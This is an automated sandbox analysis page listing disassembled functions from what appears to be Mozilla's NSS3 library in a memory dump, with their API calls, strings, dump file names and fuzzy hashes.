Instruction ID: d1d0394b465ee569820fcbe31f70f25759cf0bf3c80ac2880d91375c3a58eabf
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 3411A5B5A003059BE700AAAE6C41BABB6EC9F9455DF054139EC09D7741FB60FD08C6B6

Function 6C588C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C588C1B
EnterCriticalSection.KERNEL32 ref: 6C588C34
PL_ArenaAllocate.NSS3 ref: 6C588C65
PR_Unlock.NSS3 ref: 6C588C9C
PR_Unlock.NSS3 ref: 6C588CB6

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

Strings

KRAM, xrefs: 6C588C8F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 31ea1fd1895cc3f9e301ebcbaaf509b7c113eae10f9d7ac6be56d85425741b43
Instruction ID: 95941a76aceb0bc1d8cb55446453eb88107e3b1e9853a68eb4c4fb3edc22a4d0
Opcode Fuzzy Hash: 31ea1fd1895cc3f9e301ebcbaaf509b7c113eae10f9d7ac6be56d85425741b43
Instruction Fuzzy Hash: 3B2180B1A06621DFD700EF79C884559BBF4FF55308F05896ED8888B711EB31D885CB96

Function 6C598E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C5B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C584F1C), ref: 6C598EA2

Part of subcall function 6C5BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C5BF854
Part of subcall function 6C5BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C5BF868
Part of subcall function 6C5BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C5BF882
Part of subcall function 6C5BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C5BF889
Part of subcall function 6C5BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C5BF8A4
Part of subcall function 6C5BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C5BF8AB
Part of subcall function 6C5BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C5BF8C9
Part of subcall function 6C5BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C5BF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C5B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C584F1C), ref: 6C598EC3
TlsGetValue.KERNEL32(?,?,?,6C5B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C584F1C), ref: 6C598EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C5B2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C598EF1
PR_Unlock.NSS3 ref: 6C598F20

Strings

b.[l, xrefs: 6C598E96, 6C598F25

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.[l
API String ID: 1978757487-2683511442
Opcode ID: cc791340afe80d51a68709508a3ec25a70305a8cff60d9af6f51503976b054d9
Instruction ID: f6648964d5a881f6d08c4cc4d4d322e17eaf8749f4f780d2a2a3aafdb5c2c1c8
Opcode Fuzzy Hash: cc791340afe80d51a68709508a3ec25a70305a8cff60d9af6f51503976b054d9
Instruction Fuzzy Hash: B7219C74909645AFCB00AF2AC884199BBF4FF48318F0545AEE8889BB40DB30E854CBC2

Function 6C603E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6C605B40: PR_GetIdentitiesLayer.NSS3 ref: 6C605B56

PR_EnterMonitor.NSS3(?), ref: 6C603E45

Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390AB
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390C9
Part of subcall function 6C639090: EnterCriticalSection.KERNEL32 ref: 6C6390E5
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639116
Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C63913F

PR_EnterMonitor.NSS3(?), ref: 6C603E5C
PR_EnterMonitor.NSS3(?), ref: 6C603E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C603EA6

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PR_ExitMonitor.NSS3(?), ref: 6C603EC0
PR_ExitMonitor.NSS3(?), ref: 6C603ED7
PR_ExitMonitor.NSS3(?), ref: 6C603EEE

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 39b9ea2d38befb0060d20b7bb95b2ea0dea1c7d664c59e6842b68557a377f58d
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: 38119671610610ABD7315E29FD02EC777A1DB4130DF001935E65996A21E736E82ACB4E

Function 6C682C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C682CA0
PR_ExitMonitor.NSS3 ref: 6C682CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C682CD1
strdup.MOZGLUE(?), ref: 6C682CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C682D27

Strings

Loaded library %s (static lib), xrefs: 6C682D22

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 5b47b8c0093a420faf9490a62e51b99bab7ef8b2c48038a5550cafccda168553
Instruction ID: 20244a8aa290b4efb48e07d551d139d92fd90351e71feef36081b2abc904ac7b
Opcode Fuzzy Hash: 5b47b8c0093a420faf9490a62e51b99bab7ef8b2c48038a5550cafccda168553
Instruction Fuzzy Hash: 4A11B2B16022509FEB108F16D888A7677B4EB4631DF14812DE809C7B42E771E808CBBD

Function 6C57BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C57BDCA

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C57BDDB

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C57BDEC

Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C57BE03

Part of subcall function 6C5CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5C8D2D,?,00000000,?), ref: 6C5CFB85
Part of subcall function 6C5CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5CFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C57BE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C57BE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C57BE3B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 083fd09a12f135eef8a0203422bf4aeac65a16065e0ae38fae92ba4388ab275e
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: 3B014EB5A40301B7F62032AA7C01F9B26884FD139DF140130FE05DAF82FB55E51883BA

Function 6C5D0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016

Part of subcall function 6C6398D0: calloc.MOZGLUE(00000001,00000084,6C560936,00000001,?,6C56102C), ref: 6C6398E5

PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B
TlsGetValue.KERNEL32(00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1044
free.MOZGLUE(00000000,?,00000800,6C56EF74,00000000), ref: 6C5D1064

Strings

security, xrefs: 6C5D1025

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: f73e915046828b9831ddd93d3a42859c3ca4626767936d3604a6d15cdbc289ef
Instruction ID: ae3a62cc4757d27daaba2064bce57d97c5be9a33e40d0a0377b184bef4e3622e
Opcode Fuzzy Hash: f73e915046828b9831ddd93d3a42859c3ca4626767936d3604a6d15cdbc289ef
Instruction Fuzzy Hash: CB014830A40390A7E7207F2E8C09B473A68BF42769F020516E90897A51EB71E504DBDE

Function 6C601C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C601C74

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C601C92
free.MOZGLUE(?), ref: 6C601C99
DeleteCriticalSection.KERNEL32(?), ref: 6C601CCB
free.MOZGLUE(?), ref: 6C601CD2

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 81e1b948f61fa9d9e5b16aa359437874c3a7839957eb7c487215db2e999a360c
Instruction ID: 347000d7dafad067d70ddac8ff68f612b6ad29fa7729f142b005e522c81f89cd
Opcode Fuzzy Hash: 81e1b948f61fa9d9e5b16aa359437874c3a7839957eb7c487215db2e999a360c
Instruction Fuzzy Hash: 9F01D6B1F452116FDF14AFA69D4DB4977B4A70730DF000425E50BA2A40D325F514879E

Function 6C612E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C613046

Part of subcall function 6C5FEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5FEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C5E7FFB), ref: 6C61312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C613154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C612E8B

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

Part of subcall function 6C5FF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C5E9BFF,?,00000000,00000000), ref: 6C5FF134

memcpy.VCRUNTIME140(8B3C75C0,?,6C5E7FFA), ref: 6C612EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C61317B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 6140726a5d9552613ae26fc8b22b27e02ac24a685a43f60714d75ed8d0171520
Instruction ID: 42ed79d814bd62169aed28a8166555dbb7fcd64ed276a9c7bab44e1d3972405e
Opcode Fuzzy Hash: 6140726a5d9552613ae26fc8b22b27e02ac24a685a43f60714d75ed8d0171520
Instruction Fuzzy Hash: 3EA1D171A042189FDB24CF58CC80BEAB7B5EF46308F048199ED49A7B41E771AD45CF95

Function 6C5DED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C5DED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C5DEDCE

Part of subcall function 6C5D0BE0: malloc.MOZGLUE(6C5C8D2D,?,00000000,?), ref: 6C5D0BF8
Part of subcall function 6C5D0BE0: TlsGetValue.KERNEL32(6C5C8D2D,?,00000000,?), ref: 6C5D0C15

free.MOZGLUE(00000000,?,?,?,?,6C5DB04F), ref: 6C5DEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5DEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C5DEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C5DEEFB

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 4a69161909bd5ef9b7859d6167ea84f7647728e777ea01279ae6ce3ff511466d
Instruction ID: 980f6bde1f1c10a58773d7b3cf057b21eff7d8de90a6d083f3954d51bfc81f02
Opcode Fuzzy Hash: 4a69161909bd5ef9b7859d6167ea84f7647728e777ea01279ae6ce3ff511466d
Instruction Fuzzy Hash: A98147B1A003069FEB14CF59DC80AABB7F5EF89308F16442CE8159B751DB70E814CBA9

Function 6C5DCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C5DDAE2,?), ref: 6C5DC6C2

PR_Now.NSS3 ref: 6C5DCD35

Part of subcall function 6C639DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C680A27), ref: 6C639DC6
Part of subcall function 6C639DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C680A27), ref: 6C639DD1

Part of subcall function 6C5C6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C571C6F,00000000,00000004,?,?), ref: 6C5C6C3F

PR_GetCurrentThread.NSS3 ref: 6C5DCD54

Part of subcall function 6C639BF0: TlsGetValue.KERNEL32(?,?,?,6C680A75), ref: 6C639C07

Part of subcall function 6C5C7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C571CCC,00000000,00000000,?,?), ref: 6C5C729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5DCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C5DCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C5DCE2C

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C5DCE40

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

Part of subcall function 6C5DCEE0: PORT_ArenaMark_Util.NSS3(?,6C5DCD93,?), ref: 6C5DCEEE
Part of subcall function 6C5DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C5DCD93,?), ref: 6C5DCEFC
Part of subcall function 6C5DCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C5DCD93,?), ref: 6C5DCF0B
Part of subcall function 6C5DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C5DCD93,?), ref: 6C5DCF1D

Part of subcall function 6C5DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C5DCD93,?), ref: 6C5DCF47
Part of subcall function 6C5DCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C5DCD93,?), ref: 6C5DCF67
Part of subcall function 6C5DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C5DCD93,?,?,?,?,?,?,?,?,?,?,?,6C5DCD93,?), ref: 6C5DCF78

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadZfree
String ID:
API String ID: 2342748994-0
Opcode ID: fe85e995b6e9f196f3ef15fbe2a34566cd17df3c36ac30112ad961bd6ad4b095
Instruction ID: dff5dfa4fa8e6b806783fdc66fe7700525ebdfa3cae2eb6ddff5e6e2c73742c6
Opcode Fuzzy Hash: fe85e995b6e9f196f3ef15fbe2a34566cd17df3c36ac30112ad961bd6ad4b095
Instruction Fuzzy Hash: 77518FB6A002119BEB11EF6DDC40BAA73E5EF88358F260524D949D7740EB31FD05CB99

Function 6C5EFFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD076,00000000), ref: 6C5EFFE5

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PR_EnterMonitor.NSS3(?), ref: 6C5F0004
PR_EnterMonitor.NSS3(?), ref: 6C5F001B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: EnterMonitor$ErrorValue
String ID:
API String ID: 3413098822-0
Opcode ID: 7084aa5a22402ac85c3ac44f389a16bf7c39167ab0c140149f7d8e2d89294bc3
Instruction ID: 39f7e94e86e75872715d803510a07524123dd6fa166535bc8349eb881e3da1d0
Opcode Fuzzy Hash: 7084aa5a22402ac85c3ac44f389a16bf7c39167ab0c140149f7d8e2d89294bc3
Instruction Fuzzy Hash: DD415B752446808BE7288B29DC51BAB73A5DBC1308F58093FD46BC6E90E779E54BCF42

Function 6C5AEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C5AEF38

Part of subcall function 6C599520: PK11_IsLoggedIn.NSS3(00000000,?,6C5C379E,?,00000001,?), ref: 6C599542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C5AEF53

Part of subcall function 6C5B4C20: TlsGetValue.KERNEL32 ref: 6C5B4C4C
